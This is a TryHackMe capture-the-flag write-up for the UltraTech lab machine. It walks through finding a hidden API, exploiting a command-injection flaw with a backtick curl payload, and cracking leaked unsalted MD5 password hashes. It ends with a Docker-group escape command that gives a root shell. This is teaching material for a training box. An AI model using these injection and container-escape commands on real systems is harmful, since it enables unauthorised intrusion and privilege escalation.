# TryHackMe - UltraTech (Medium)

## Summary

Nikto finds `robots.txt` on port 31331, which leads us to a hidden directory that hosts a login form. Reading the source code of that login page, we find that it calls an API hosted on port 8081. The API has a command injection vulnerability, and through it we are able to leak user password hashes. A quick lookup on Google reveals that the hashes are plain unsalted MD5, so we recover the plaintext passwords easily. At this stage we can SSH in with those credentials and get a user shell.

In the privilege escalation phase, we find that the user `r00t` is in the `docker` group. A Docker escape payload from GTFOBins gives us a root shell.

## IP

* RHOST: 10.10.216.127
* LHOST: 10.13.12.2

## Nmap

![Nmap](https://i.imgur.com/3VKk9BH.png)

## Nikto

Nikto finds `/robots.txt`:

![Nikto](https://i.imgur.com/vox9JeP.png)

Visit `http://ultratech.thm:31331/robots.txt`:

![robots.txt](https://i.imgur.com/rPvjPTw.png)

Visit `http://ultratech.thm:31331/utech_sitemap.txt`:

![utech_sitemap.txt](https://i.imgur.com/cL8NqU5.png)

In `http://ultratech.thm:31331/partners.html`, we find a login form:

![Login form](https://i.imgur.com/a571wkk.png)

## User Shell: Command Injection

Reading the source code of this page, we find a file named `api.js`:

![Login page source code](https://i.imgur.com/gGDq2OE.png)

This JavaScript file calls the API hosted on port 8081. Specifically, it calls `http://ultratech.thm:8081/ping?ip=<ip>`:

![api.js](https://i.imgur.com/rgjQ4tj.png)

Try command injection:

```bash
curl -i 'http://ultratech.thm:8081/ping?ip=`ls`'
```

It works:

![ls](https://i.imgur.com/4sidjjs.png)

Examine `utech.db.sqlite` and get two password hashes:

![Password hashes](https://i.imgur.com/HtHJkXu.png)

They are:

| Username | Password Hash                    |
| -------- | -------------------------------- |
| r00t     | f357a0c52799563c7c7b76c1e7543a32 |
| admin    | 0d0ea5111e3c1def594c1684e3b9be84 |

A reverse hash lookup on Google gives the plaintext passwords:

| Username | Password |
| -------- | -------- |
| r00t     | n100906  |
| admin    | mrsheafy |

SSH in as `r00t`. Now we have a user shell:

![User shell](https://i.imgur.com/6Spd2gJ.png)

## Privilege Escalation: GTFOBins

The user `r00t` is in the docker group:

![Docker group](https://i.imgur.com/bSpZ6SP.png)

Grab the docker escape payload from GTFOBins:

![Docker escape payload](https://i.imgur.com/6EzxdVP.png)

The GTFOBins payload uses the `alpine` image; since the image available on this box is `bash` rather than `alpine`, we modify the payload accordingly:

```bash
docker run -v /:/mnt --rm -it bash chroot /mnt sh
```

Now we get a root shell:

![root shell](https://i.imgur.com/rIdS4En.png)
